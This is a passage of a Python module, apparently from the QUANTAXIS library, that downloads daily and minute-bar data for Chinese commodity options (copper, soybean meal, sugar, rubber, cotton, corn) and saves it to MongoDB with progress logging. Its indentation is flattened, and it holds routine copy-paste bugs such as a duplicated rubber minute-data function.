port=None
)
retCount = df0.iloc[:, 0].size
QA_util_log_info(
"日期从开始{}-结束{} , 合约代码{} , 获取了{}条记录 , 准备写入数据库^_^ ".format(
start_date,
end_date,
code,
retCount
),
ui_log=ui_log
)
coll_option_commodity_cf_day.insert_many(
QA_util_to_json_from_pandas(df0)
)
else:
QA_util_log_info(
"*已经获取过这天的数据了* {}".format(start_date),
ui_log=ui_log
)
except Exception as error0:
print(error0)
err.append(str(code))
for item in range(len(option_cf_contract_list)):
QA_util_log_info(
'The {} of Total {}'.format(item,
len(option_cf_contract_list)),
ui_log=ui_log
)
strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
str(float(item / len(option_cf_contract_list) * 100))[0:4] + '%'
)
intLogProgress = int(
float(item / len(option_cf_contract_list) * 10000.0)
)
QA_util_log_info(
strLogProgress,
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=intLogProgress
)
__saving_work(
option_cf_contract_list[item].code,
coll_option_commodity_cf_day
)
if len(err) < 1:
QA_util_log_info('SUCCESS save option ru day ^_^ ', ui_log=ui_log)
else:
QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
QA_util_log_info(err, ui_log=ui_log)
def _save_option_commodity_sr_day(
client=DATABASE,
ui_log=None,
ui_progress=None
):
##################### sr 白糖 ############################################################################
option_sr_contract_list = QA_fetch_get_commodity_option_SR_contract_time_to_market(
)
coll_option_commodity_sr_day = client.option_commodity_sr_day
coll_option_commodity_sr_day.create_index(
[("code",
pymongo.ASCENDING),
("date_stamp",
pymongo.ASCENDING)]
)
err = []
def __saving_work(code, coll_option_commodity_sr_day):
try:
QA_util_log_info(
'##JOB12 Now Saving OPTION_DAY_COMMODITY_SR 白糖 ==== {}'.format(
str(code)
),
ui_log=ui_log
)
# 首选查找数据库 是否 有 这个代码的数据
ref = coll_option_commodity_sr_day.find({'code': str(code)[0:8]})
end_date = str(now_time())[0:10]
# 当前数据库已经包含了这个代码的数据, 继续增量更新
# 加入这个判断的原因是因为如果是刚上市的 数据库会没有数据 所以会有负索引问题出现
if ref.count() > 0:
# 接着上次获取的日期继续更新
start_date = ref[ref.count() - 1]['date']
QA_util_log_info(
' 上次获取期权sr白糖日线数据的最后日期是 {}'.format(start_date),
ui_log=ui_log
)
QA_util_log_info(
'UPDATE_OPTION_M_DAY \n 从上一次下载数据开始继续 Trying update {} from {} to {}'
.format(code,
start_date,
end_date),
ui_log=ui_log
)
if start_date != end_date:
start_date0 = QA_util_get_next_day(start_date)
df0 = QA_fetch_get_option_day(
code=code,
start_date=start_date0,
end_date=end_date,
frequence='day',
ip=None,
port=None
)
retCount = df0.iloc[:, 0].size
QA_util_log_info(
"日期从开始{}-结束{} , 合约代码{} , 返回了{}条记录 , 准备写入数据库".format(
start_date0,
end_date,
code,
retCount
),
ui_log=ui_log
)
coll_option_commodity_sr_day.insert_many(
QA_util_to_json_from_pandas(df0)
)
else:
QA_util_log_info(
"^已经获取过这天的数据了^ {}".format(start_date),
ui_log=ui_log
)
else:
start_date = '1990-01-01'
QA_util_log_info(
'UPDATE_M_OPTION_DAY \n 从新开始下载数据 Trying update {} from {} to {}'
.format(code,
start_date,
end_date),
ui_log=ui_log
)
if start_date != end_date:
df0 = QA_fetch_get_option_day(
code=code,
start_date=start_date,
end_date=end_date,
frequence='day',
ip=None,
port=None
)
retCount = df0.iloc[:, 0].size
QA_util_log_info(
"日期从开始{}-结束{} , 合约代码{} , 获取了{}条记录 , 准备写入数据库^_^ ".format(
start_date,
end_date,
code,
retCount
),
ui_log=ui_log
)
coll_option_commodity_sr_day.insert_many(
QA_util_to_json_from_pandas(df0)
)
else:
QA_util_log_info(
"*已经获取过这天的数据了* {}".format(start_date),
ui_log=ui_log
)
except Exception as error0:
print(error0)
err.append(str(code))
for item in range(len(option_sr_contract_list)):
QA_util_log_info(
'The {} of Total {}'.format(item,
len(option_sr_contract_list)),
ui_log=ui_log
)
strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
str(float(item / len(option_sr_contract_list) * 100))[0:4] + '%'
)
intLogProgress = int(
float(item / len(option_sr_contract_list) * 10000.0)
)
QA_util_log_info(
strLogProgress,
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=intLogProgress
)
__saving_work(
option_sr_contract_list[item].code,
coll_option_commodity_sr_day
)
if len(err) < 1:
QA_util_log_info('SUCCESS save option sr day ^_^ ', ui_log=ui_log)
else:
QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
QA_util_log_info(err, ui_log=ui_log)
def _save_option_commodity_m_day(
client=DATABASE,
ui_log=None,
ui_progress=None
):
##################### M 豆粕 ############################################################################
option_m_contract_list = QA_fetch_get_commodity_option_M_contract_time_to_market(
)
coll_option_commodity_m_day = client.option_commodity_m_day
coll_option_commodity_m_day.create_index(
[("code",
pymongo.ASCENDING),
("date_stamp",
pymongo.ASCENDING)]
)
err = []
def __saving_work(code, coll_option_commodity_m_day):
try:
QA_util_log_info(
'##JOB12 Now Saving OPTION_DAY_COMMODITY_M 豆粕 ==== {}'.format(
str(code)
),
ui_log=ui_log
)
# 首选查找数据库 是否 有 这个代码的数据
# M XXXXXX 编码格式
ref = coll_option_commodity_m_day.find({'code': str(code)[0:8]})
end_date = str(now_time())[0:10]
# 当前数据库已经包含了这个代码的数据, 继续增量更新
# 加入这个判断的原因是因为如果是刚上市的 数据库会没有数据 所以会有负索引问题出现
if ref.count() > 0:
# 接着上次获取的日期继续更新
start_date = ref[ref.count() - 1]['date']
QA_util_log_info(
' 上次获取期权M豆粕日线数据的最后日期是 {}'.format(start_date),
ui_log=ui_log
)
QA_util_log_info(
'UPDATE_OPTION_M_DAY \n 从上一次下载数据开始继续 Trying update {} from {} to {}'
.format(code,
start_date,
end_date),
ui_log=ui_log
)
if start_date != end_date:
start_date0 = QA_util_get_next_day(start_date)
df0 = QA_fetch_get_option_day(
code=code,
start_date=start_date0,
end_date=end_date,
frequence='day',
ip=None,
port=None
)
retCount = df0.iloc[:, 0].size
QA_util_log_info(
"日期从开始{}-结束{} , 合约代码{} , 返回了{}条记录 , 准备写入数据库".format(
start_date0,
end_date,
code,
retCount
),
ui_log=ui_log
)
coll_option_commodity_m_day.insert_many(
QA_util_to_json_from_pandas(df0)
)
else:
QA_util_log_info(
"^已经获取过这天的数据了^ {}".format(start_date),
ui_log=ui_log
)
else:
start_date = '1990-01-01'
QA_util_log_info(
'UPDATE_M_OPTION_DAY \n 从新开始下载数据 Trying update {} from {} to {}'
.format(code,
start_date,
end_date),
ui_log=ui_log
)
if start_date != end_date:
df0 = QA_fetch_get_option_day(
code=code,
start_date=start_date,
end_date=end_date,
frequence='day',
ip=None,
port=None
)
retCount = df0.iloc[:, 0].size
QA_util_log_info(
"日期从开始{}-结束{} , 合约代码{} , 获取了{}条记录 , 准备写入数据库^_^ ".format(
start_date,
end_date,
code,
retCount
),
ui_log=ui_log
)
coll_option_commodity_m_day.insert_many(
QA_util_to_json_from_pandas(df0)
)
else:
QA_util_log_info(
"*已经获取过这天的数据了* {}".format(start_date),
ui_log=ui_log
)
except Exception as error0:
print(error0)
err.append(str(code))
for item in range(len(option_m_contract_list)):
QA_util_log_info(
'The {} of Total {}'.format(item,
len(option_m_contract_list)),
ui_log=ui_log
)
strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
str(float(item / len(option_m_contract_list) * 100))[0:4] + '%'
)
intLogProgress = int(
float(item / len(option_m_contract_list) * 10000.0)
)
QA_util_log_info(
strLogProgress,
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=intLogProgress
)
__saving_work(
option_m_contract_list[item].code,
coll_option_commodity_m_day
)
if len(err) < 1:
QA_util_log_info('SUCCESS save option m day ^_^ ', ui_log=ui_log)
else:
QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
QA_util_log_info(err, ui_log=ui_log)
def _save_option_commodity_cu_day(
client=DATABASE,
ui_log=None,
ui_progress=None
):
##################### CU 铜 ############################################################################
option_cu_contract_list = QA_fetch_get_commodity_option_CU_contract_time_to_market(
)
coll_option_commodity_cu_day = client.option_commodity_cu_day
coll_option_commodity_cu_day.create_index(
[("code",
pymongo.ASCENDING),
("date_stamp",
pymongo.ASCENDING)]
)
err = []
def __saving_work(code, coll_option_commodity_cu_day):
try:
QA_util_log_info(
'##JOB12 Now Saving OPTION_DAY_COMMODITY_CU 铜 ==== {}'.format(
str(code)
),
ui_log=ui_log
)
# 首选查找数据库 是否 有 这个代码的数据
# 期权代码 从 10000001 开始编码 10001228
ref = coll_option_commodity_cu_day.find({'code': str(code)[0:8]})
end_date = str(now_time())[0:10]
# 当前数据库已经包含了这个代码的数据, 继续增量更新
# 加入这个判断的原因是因为如果是刚上市的 数据库会没有数据 所以会有负索引问题出现
if ref.count() > 0:
# 接着上次获取的日期继续更新
start_date = ref[ref.count() - 1]['date']
QA_util_log_info(
' 上次获取期权CU日线数据的最后日期是 {}'.format(start_date),
ui_log=ui_log
)
QA_util_log_info(
'UPDATE_OPTION_CU_DAY \n 从上一次下载数据开始继续 Trying update {} from {} to {}'
.format(code,
start_date,
end_date),
ui_log=ui_log
)
if start_date != end_date:
start_date0 = QA_util_get_next_day(start_date)
df0 = QA_fetch_get_option_day(
code=code,
start_date=start_date0,
end_date=end_date,
frequence='day',
ip=None,
port=None
)
retCount = df0.iloc[:, 0].size
QA_util_log_info(
"日期从开始{}-结束{} , 合约代码{} , 返回了{}条记录 , 准备写入数据库".format(
start_date0,
end_date,
code,
retCount
),
ui_log=ui_log
)
coll_option_commodity_cu_day.insert_many(
QA_util_to_json_from_pandas(df0)
)
else:
QA_util_log_info(
"^已经获取过这天的数据了^ {}".format(start_date),
ui_log=ui_log
)
else:
start_date = '1990-01-01'
QA_util_log_info(
'UPDATE_CU_OPTION_DAY \n 从新开始下载数据 Trying update {} from {} to {}'
.format(code,
start_date,
end_date),
ui_log=ui_log
)
if start_date != end_date:
df0 = QA_fetch_get_option_day(
code=code,
start_date=start_date,
end_date=end_date,
frequence='day',
ip=None,
port=None
)
retCount = df0.iloc[:, 0].size
QA_util_log_info(
"日期从开始{}-结束{} , 合约代码{} , 获取了{}条记录 , 准备写入数据库^_^ ".format(
start_date,
end_date,
code,
retCount
),
ui_log=ui_log
)
coll_option_commodity_cu_day.insert_many(
QA_util_to_json_from_pandas(df0)
)
else:
QA_util_log_info(
"*已经获取过这天的数据了* {}".format(start_date),
ui_log=ui_log
)
except Exception as error0:
print(error0)
err.append(str(code))
for item in range(len(option_cu_contract_list)):
QA_util_log_info(
'The {} of Total {}'.format(item,
len(option_cu_contract_list)),
ui_log=ui_log
)
strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
str(float(item / len(option_cu_contract_list) * 100))[0:4] + '%'
)
intLogProgress = int(
float(item / len(option_cu_contract_list) * 10000.0)
)
QA_util_log_info(
strLogProgress,
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=intLogProgress
)
__saving_work(
option_cu_contract_list[item].code,
coll_option_commodity_cu_day
)
if len(err) < 1:
QA_util_log_info('SUCCESS save option cu day ^_^ ', ui_log=ui_log)
else:
QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
QA_util_log_info(err, ui_log=ui_log)
def QA_SU_save_option_commodity_day(
client=DATABASE,
ui_log=None,
ui_progress=None
):
'''
:param client:
:return:
'''
_save_option_commodity_cu_day(
client=client,
ui_log=ui_log,
ui_progress=ui_progress
)
_save_option_commodity_m_day(
client=client,
ui_log=ui_log,
ui_progress=ui_progress
)
_save_option_commodity_sr_day(
client=client,
ui_log=ui_log,
ui_progress=ui_progress
)
_save_option_commodity_ru_day(
client=client,
ui_log=ui_log,
ui_progress=ui_progress
)
_save_option_commodity_cf_day(
client=client,
ui_log=ui_log,
ui_progress=ui_progress
)
_save_option_commodity_c_day(
client=client,
ui_log=ui_log,
ui_progress=ui_progress
)
'''
期权分钟线
todo: 代码需要重构 , 把重复的代码合并在一起
'''
def _save_option_commodity_ru_min(
client=DATABASE,
ui_log=None,
ui_progress=None
):
'''
:param client:
:param ui_log:
:param ui_progress:
:return:
'''
'''
:param client:
:return:
'''
option_contract_list = QA_fetch_get_commodity_option_C_contract_time_to_market()
coll_option_min = client.option_commodity_ru_min
coll_option_min.create_index(
[("code",
pymongo.ASCENDING),
("date_stamp",
pymongo.ASCENDING)]
)
err = []
# 索引 code
err = []
def __saving_work(code, coll):
QA_util_log_info(
'##JOB13 Now Saving Option RU 棉花 MIN ==== {}'.format(str(code)),
ui_log=ui_log
)
try:
for type in ['1min', '5min', '15min', '30min', '60min']:
ref_ = coll.find({'code': str(code)[0:8], 'type': type})
end_time = str(now_time())[0:19]
if ref_.count() > 0:
start_time = ref_[ref_.count() - 1]['datetime']
QA_util_log_info(
'##JOB13.{} Now Saving Option RU 天然橡胶 {} from {} to {} =={} '
.format(
['1min',
'5min',
'15min',
'30min',
'60min'].index(type),
str(code),
start_time,
end_time,
type
),
ui_log=ui_log
)
if start_time != end_time:
__data = QA_fetch_get_future_min(
str(code),
start_time,
end_time,
type
)
if len(__data) > 1:
QA_util_log_info(
" 写入 新增历史合约记录数 {} ".format(len(__data))
)
coll.insert_many(
QA_util_to_json_from_pandas(__data[1::])
)
else:
start_time = '2015-01-01'
QA_util_log_info(
'##JOB13.{} Now Option RU 天然橡胶 {} from {} to {} =={} '
.format(
['1min',
'5min',
'15min',
'30min',
'60min'].index(type),
str(code),
start_time,
end_time,
type
),
ui_log=ui_log
)
if start_time != end_time:
__data = QA_fetch_get_future_min(
str(code),
start_time,
end_time,
type
)
if len(__data) > 1:
QA_util_log_info(
" 写入 新增合约记录数 {} ".format(len(__data))
)
coll.insert_many(
QA_util_to_json_from_pandas(__data)
)
except:
err.append(code)
executor = ThreadPoolExecutor(max_workers=4)
res = {
executor.submit(
__saving_work,
option_contract_list[i_]["code"],
coll_option_min
)
for i_ in range(len(option_contract_list))
} # multi index ./.
count = 0
for i_ in concurrent.futures.as_completed(res):
QA_util_log_info(
'The {} of Total {}'.format(count,
len(option_contract_list)),
ui_log=ui_log
)
strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
str(float(count / len(option_contract_list) * 100))[0:4] + '%'
)
intLogProgress = int(float(count / len(option_contract_list) * 10000.0))
QA_util_log_info(
strLogProgress,
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=intLogProgress
)
count = count + 1
if len(err) < 1:
QA_util_log_info('SUCCESS', ui_log=ui_log)
else:
QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
QA_util_log_info(err, ui_log=ui_log)
pass
def _save_option_commodity_c_min(
client=DATABASE,
ui_log=None,
ui_progress=None
):
'''
:param client:
:param ui_log:
:param ui_progress:
:return:
'''
'''
:param client:
:return:
'''
option_contract_list = QA_fetch_get_commodity_option_C_contract_time_to_market()
coll_option_min = client.option_commodity_c_min
coll_option_min.create_index(
[("code",
pymongo.ASCENDING),
("date_stamp",
pymongo.ASCENDING)]
)
err = []
# 索引 code
err = []
def __saving_work(code, coll):
QA_util_log_info(
'##JOB13 Now Saving Option C 玉米 MIN ==== {}'.format(str(code)),
ui_log=ui_log
)
try:
for type in ['1min', '5min', '15min', '30min', '60min']:
ref_ = coll.find({'code': str(code)[0:8], 'type': type})
end_time = str(now_time())[0:19]
if ref_.count() > 0:
start_time = ref_[ref_.count() - 1]['datetime']
QA_util_log_info(
'##JOB13.{} Now Saving Option C 玉米 {} from {} to {} =={} '
.format(
['1min',
'5min',
'15min',
'30min',
'60min'].index(type),
str(code),
start_time,
end_time,
type
),
ui_log=ui_log
)
if start_time != end_time:
__data = QA_fetch_get_future_min(
str(code),
start_time,
end_time,
type
)
if len(__data) > 1:
QA_util_log_info(
" 写入 新增历史合约记录数 {} ".format(len(__data))
)
coll.insert_many(
QA_util_to_json_from_pandas(__data[1::])
)
else:
start_time = '2015-01-01'
QA_util_log_info(
'##JOB13.{} Now Option C 玉米 {} from {} to {} =={} '
.format(
['1min',
'5min',
'15min',
'30min',
'60min'].index(type),
str(code),
start_time,
end_time,
type
),
ui_log=ui_log
)
if start_time != end_time:
__data = QA_fetch_get_future_min(
str(code),
start_time,
end_time,
type
)
if len(__data) > 1:
QA_util_log_info(
" 写入 新增合约记录数 {} ".format(len(__data))
)
coll.insert_many(
QA_util_to_json_from_pandas(__data)
)
except:
err.append(code)
executor = ThreadPoolExecutor(max_workers=4)
res = {
executor.submit(
__saving_work,
option_contract_list[i_]["code"],
coll_option_min
)
for i_ in range(len(option_contract_list))
} # multi index ./.
count = 0
for i_ in concurrent.futures.as_completed(res):
QA_util_log_info(
'The {} of Total {}'.format(count,
len(option_contract_list)),
ui_log=ui_log
)
strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
str(float(count / len(option_contract_list) * 100))[0:4] + '%'
)
intLogProgress = int(float(count / len(option_contract_list) * 10000.0))
QA_util_log_info(
strLogProgress,
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=intLogProgress
)
count = count + 1
if len(err) < 1:
QA_util_log_info('SUCCESS', ui_log=ui_log)
else:
QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
QA_util_log_info(err, ui_log=ui_log)
pass
def _save_option_commodity_cf_min(
client=DATABASE,
ui_log=None,
ui_progress=None
):
'''
:param client:
:param ui_log:
:param ui_progress:
:return:
'''
'''
:param client:
:return:
'''
option_contract_list = QA_fetch_get_commodity_option_CF_contract_time_to_market()
coll_option_min = client.option_commodity_cf_min
coll_option_min.create_index(
[("code",
pymongo.ASCENDING),
("date_stamp",
pymongo.ASCENDING)]
)
err = []
# 索引 code
err = []
def __saving_work(code, coll):
QA_util_log_info(
'##JOB13 Now Saving Option CF 棉花 MIN ==== {}'.format(str(code)),
ui_log=ui_log
)
try:
for type in ['1min', '5min', '15min', '30min', '60min']:
ref_ = coll.find({'code': str(code)[0:8], 'type': type})
end_time = str(now_time())[0:19]
if ref_.count() > 0:
start_time = ref_[ref_.count() - 1]['datetime']
QA_util_log_info(
'##JOB13.{} Now Saving Option CF 棉花 {} from {} to {} =={} '
.format(
['1min',
'5min',
'15min',
'30min',
'60min'].index(type),
str(code),
start_time,
end_time,
type
),
ui_log=ui_log
)
if start_time != end_time:
__data = QA_fetch_get_future_min(
str(code),
start_time,
end_time,
type
)
if len(__data) > 1:
QA_util_log_info(
" 写入 新增历史合约记录数 {} ".format(len(__data))
)
coll.insert_many(
QA_util_to_json_from_pandas(__data[1::])
)
else:
start_time = '2015-01-01'
QA_util_log_info(
'##JOB13.{} Now Option CF 棉花 {} from {} to {} =={} '
.format(
['1min',
'5min',
'15min',
'30min',
'60min'].index(type),
str(code),
start_time,
end_time,
type
),
ui_log=ui_log
)
if start_time != end_time:
__data = QA_fetch_get_future_min(
str(code),
start_time,
end_time,
type
)
if len(__data) > 1:
QA_util_log_info(
" 写入 新增合约记录数 {} ".format(len(__data))
)
coll.insert_many(
QA_util_to_json_from_pandas(__data)
)
except:
err.append(code)
executor = ThreadPoolExecutor(max_workers=4)
res = {
executor.submit(
__saving_work,
option_contract_list[i_]["code"],
coll_option_min
)
for i_ in range(len(option_contract_list))
} # multi index ./.
count = 0
for i_ in concurrent.futures.as_completed(res):
QA_util_log_info(
'The {} of Total {}'.format(count,
len(option_contract_list)),
ui_log=ui_log
)
strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
str(float(count / len(option_contract_list) * 100))[0:4] + '%'
)
intLogProgress = int(float(count / len(option_contract_list) * 10000.0))
QA_util_log_info(
strLogProgress,
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=intLogProgress
)
count = count + 1
if len(err) < 1:
QA_util_log_info('SUCCESS', ui_log=ui_log)
else:
QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
QA_util_log_info(err, ui_log=ui_log)
pass
def _save_option_commodity_ru_min(
client=DATABASE,
ui_log=None,
ui_progress=None
):
'''
:param client:
:param ui_log:
:param ui_progress:
:return:
'''
'''
:param client:
:return:
'''
option_contract_list = QA_fetch_get_commodity_option_RU_contract_time_to_market(
)
coll_option_min = client.option_commodity_ru_min
coll_option_min.create_index(
[("code",
pymongo.ASCENDING),
("date_stamp",
pymongo.ASCENDING)]
)
err = []
# 索引 code
err = []
def __saving_work(code, coll):
QA_util_log_info(
'##JOB13 Now Saving Option RU 天然橡胶 MIN ==== {}'.format(str(code)),
ui_log=ui_log
)
try:
for type in ['1min', '5min', '15min', '30min', '60min']:
ref_ = coll.find({'code': str(code)[0:8], 'type': type})
end_time = str(now_time())[0:19]
if ref_.count() > 0:
start_time = ref_[ref_.count() - 1]['datetime']
QA_util_log_info(
'##JOB13.{} Now Saving Option RU 天然橡胶 {} from {} to {} =={} '
.format(
['1min',
'5min',
'15min',
'30min',
'60min'].index(type),
str(code),
start_time,
end_time,
type
),
ui_log=ui_log
)
if start_time != end_time:
__data = QA_fetch_get_future_min(
str(code),
start_time,
end_time,
type
)
if len(__data) > 1:
QA_util_log_info(
" 写入 新增历史合约记录数 {} ".format(len(__data))
)
coll.insert_many(
QA_util_to_json_from_pandas(__data[1::])
)
else:
start_time = '2015-01-01'
QA_util_log_info(
'##JOB13.{} Now Option RU 天然橡胶 {} from {} to {} =={} '
.format(
['1min',
'5min',
'15min',
'30min',
'60min'].index(type),
str(code),
start_time,
end_time,
type
),
ui_log=ui_log
)
if start_time != end_time:
__data = QA_fetch_get_future_min(
str(code),
start_time,
end_time,
type
)
if len(__data) > 1:
QA_util_log_info(
" 写入 新增合约记录数 {} ".format(len(__data))
)
coll.insert_many(
QA_util_to_json_from_pandas(__data)
)
except:
err.append(code)
executor = ThreadPoolExecutor(max_workers=4)
res = {
executor.submit(
__saving_work,
option_contract_list[i_]["code"],
coll_option_min
)
for i_ in range(len(option_contract_list))
} # multi index ./.
count = 0
for i_ in concurrent.futures.as_completed(res):
QA_util_log_info(
'The {} of Total {}'.format(count,
len(option_contract_list)),
ui_log=ui_log
)
strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
str(float(count / len(option_contract_list) * 100))[0:4] + '%'
)
intLogProgress = int(float(count / len(option_contract_list) * 10000.0))
QA_util_log_info(
strLogProgress,
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=intLogProgress
)
count = count + 1
if len(err) < 1:
QA_util_log_info('SUCCESS', ui_log=ui_log)
else:
QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
QA_util_log_info(err, ui_log=ui_log)
pass
def _save_option_commodity_cu_min(
client=DATABASE,
ui_log=None,
ui_progress=None
):
'''
:param client:
:param ui_log:
:param ui_progress:
:return:
'''
'''
:param client:
:return:
'''
option_contract_list = QA_fetch_get_commodity_option_CU_contract_time_to_market(
)
coll_option_min = client.option_commodity_cu_min
coll_option_min.create_index(
[("code",
pymongo.ASCENDING),
("date_stamp",
pymongo.ASCENDING)]
)
err = []
# 索引 code
err = []
def __saving_work(code, coll):
QA_util_log_info(
'##JOB13 Now Saving Option CU 铜 MIN ==== {}'.format(str(code)),
ui_log=ui_log
)
try:
for type in ['1min', '5min', '15min', '30min', '60min']:
ref_ = coll.find({'code': str(code)[0:8], 'type': type})
end_time = str(now_time())[0:19]
if ref_.count() > 0:
start_time = ref_[ref_.count() - 1]['datetime']
QA_util_log_info(
'##JOB13.{} Now Saving Option CU 铜 {} from {} to {} =={} '
.format(
['1min',
'5min',
'15min',
'30min',
'60min'].index(type),
str(code),
start_time,
end_time,
type
),
ui_log=ui_log
)
if start_time != end_time:
__data = QA_fetch_get_future_min(
str(code),
start_time,
end_time,
type
)
if len(__data) > 1:
QA_util_log_info(
" 写入 新增历史合约记录数 {} ".format(len(__data))
)
coll.insert_many(
QA_util_to_json_from_pandas(__data[1::])
)
else:
start_time = '2015-01-01'
QA_util_log_info(
'##JOB13.{} Now Option CU 铜 {} from {} to {} =={} '
.format(
['1min',
'5min',
'15min',
'30min',
'60min'].index(type),
str(code),
start_time,
end_time,
type
),
ui_log=ui_log
)
if start_time != end_time:
__data = QA_fetch_get_future_min(
str(code),
start_time,
end_time,
type
)
if len(__data) > 1:
QA_util_log_info(
" 写入 新增合约记录数 {} ".format(len(__data))
)
coll.insert_many(
QA_util_to_json_from_pandas(__data)
)
except:
err.append(code)
executor = ThreadPoolExecutor(max_workers=4)
res = {
executor.submit(
__saving_work,
option_contract_list[i_]["code"],
coll_option_min
)
for i_ in range(len(option_contract_list))
} # multi index ./.
count = 0
for i_ in concurrent.futures.as_completed(res):
QA_util_log_info(
'The {} of Total {}'.format(count,
len(option_contract_list)),
ui_log=ui_log
)
strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
str(float(count / len(option_contract_list) * 100))[0:4] + '%'
)
intLogProgress = int(float(count / len(option_contract_list) * 10000.0))
QA_util_log_info(
strLogProgress,
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=intLogProgress
)
count = count + 1
if len(err) < 1:
QA_util_log_info('SUCCESS', ui_log=ui_log)
else:
QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
QA_util_log_info(err, ui_log=ui_log)
pass
def _save_option_commodity_sr_min(
client=DATABASE,
ui_log=None,
ui_progress=None
):
'''
:param client:
:param ui_log:
:param ui_progress:
:return:
'''
'''
:param client:
:return:
'''
option_contract_list = QA_fetch_get_commodity_option_SR_contract_time_to_market(
)
coll_option_min = client.option_commodity_sr_min
coll_option_min.create_index(
[("code",
pymongo.ASCENDING),
("date_stamp",
pymongo.ASCENDING)]
)
err = []
# 索引 code
err = []
def __saving_work(code, coll):
QA_util_log_info(
'##JOB13 Now Saving Option SR 白糖 ==== {}'.format(str(code)),
ui_log=ui_log
)
try:
for type in ['1min', '5min', '15min', '30min', '60min']:
ref_ = coll.find({'code': str(code)[0:8], 'type': type})
end_time = str(now_time())[0:19]
if ref_.count() > 0:
start_time = ref_[ref_.count() - 1]['datetime']
QA_util_log_info(
'##JOB13.{} Now Saving Option SR 白糖 {} from {} to {} =={} '
.format(
['1min',
'5min',
'15min',
'30min',
'60min'].index(type),
str(code),
start_time,
end_time,
type
),
ui_log=ui_log
)
if start_time != end_time:
__data = QA_fetch_get_future_min(
str(code),
start_time,
end_time,
type
)
if len(__data) > 1:
QA_util_log_info(
" 写入 新增历史合约记录数 {} ".format(len(__data))
)
coll.insert_many(
QA_util_to_json_from_pandas(__data[1::])
)
else:
start_time = '2015-01-01'
QA_util_log_info(
'##JOB13.{} Now Option SR 白糖 {} from {} to {} =={} '
.format(
['1min',
'5min',
'15min',
'30min',
'60min'].index(type),
str(code),
start_time,
end_time,
type
),
ui_log=ui_log
)
if start_time != end_time:
__data = QA_fetch_get_future_min(
str(code),
start_time,
end_time,
type
)
if len(__data) > 1:
QA_util_log_info(
" 写入 新增合约记录数 {} ".format(len(__data))
)
coll.insert_many(
QA_util_to_json_from_pandas(__data)
)
except:
err.append(code)
executor = ThreadPoolExecutor(max_workers=4)
res = {
executor.submit(
__saving_work,
option_contract_list[i_]["code"],
coll_option_min
)
for i_ in range(len(option_contract_list))
} # multi index ./.
count = 0
for i_ in concurrent.futures.as_completed(res):
QA_util_log_info(
'The {} of Total {}'.format(count,
len(option_contract_list)),
ui_log=ui_log
)
strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
str(float(count / len(option_contract_list) * 100))[0:4] + '%'
)
intLogProgress = int(float(count / len(option_contract_list) * 10000.0))
QA_util_log_info(
strLogProgress,
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=intLogProgress
)
count = count + 1
if len(err) < 1:
QA_util_log_info('SUCCESS', ui_log=ui_log)
else:
QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
QA_util_log_info(err, ui_log=ui_log)
pass
def _save_option_commodity_m_min(
client=DATABASE,
ui_log=None,
ui_progress=None
):
'''
:param client:
:param ui_log:
:param ui_progress:
:return:
'''
option_contract_list = QA_fetch_get_commodity_option_M_contract_time_to_market(
)
coll_option_min = client.option_commodity_m_min
coll_option_min.create_index(
[("code",
pymongo.ASCENDING),
("date_stamp",
pymongo.ASCENDING)]
)
err = []
# 索引 code
err = []
def __saving_work(code, coll):
QA_util_log_info(
'##JOB13 Now Saving Option M 豆粕 ==== {}'.format(str(code)),
ui_log=ui_log
)
try:
for type in ['1min', '5min', '15min', '30min', '60min']:
ref_ = coll.find({'code': str(code)[0:8], 'type': type})
end_time = str(now_time())[0:19]
if ref_.count() > 0:
start_time = ref_[ref_.count() - 1]['datetime']
QA_util_log_info(
'##JOB13.{} Now Saving Option M 豆粕 {} from {} to {} =={} '
.format(
['1min',
'5min',
'15min',
'30min',
'60min'].index(type),
str(code),
start_time,
end_time,
type
),
ui_log=ui_log
)
if start_time != end_time:
__data = QA_fetch_get_future_min(
str(code),
start_time,
end_time,
type
)
if len(__data) > 1:
QA_util_log_info(
" 写入 新增历史合约记录数 {} ".format(len(__data))
)
coll.insert_many(
QA_util_to_json_from_pandas(__data[1::])
)
else:
start_time = '2015-01-01'
QA_util_log_info(
'##JOB13.{} Now Option M 豆粕 {} from {} to {} =={} '
.format(
['1min',
'5min',
'15min',
'30min',
'60min'].index(type),
str(code),
start_time,
end_time,
type
),
ui_log=ui_log
)
if start_time != end_time:
__data = QA_fetch_get_future_min(
str(code),
start_time,
end_time,
type
)
if len(__data) > 1:
QA_util_log_info(
" 写入 新增合约记录数 {} ".format(len(__data))
)
coll.insert_many(
QA_util_to_json_from_pandas(__data)
)
except:
err.append(code)
executor = ThreadPoolExecutor(max_workers=4)
res = {
executor.submit(
__saving_work,
option_contract_list[i_]["code"],
coll_option_min
)
for i_ in range(len(option_contract_list))
} # multi index ./.
count = 0
for i_ in concurrent.futures.as_completed(res):
QA_util_log_info(
'The {} of Total {}'.format(count,
len(option_contract_list)),
ui_log=ui_log
)
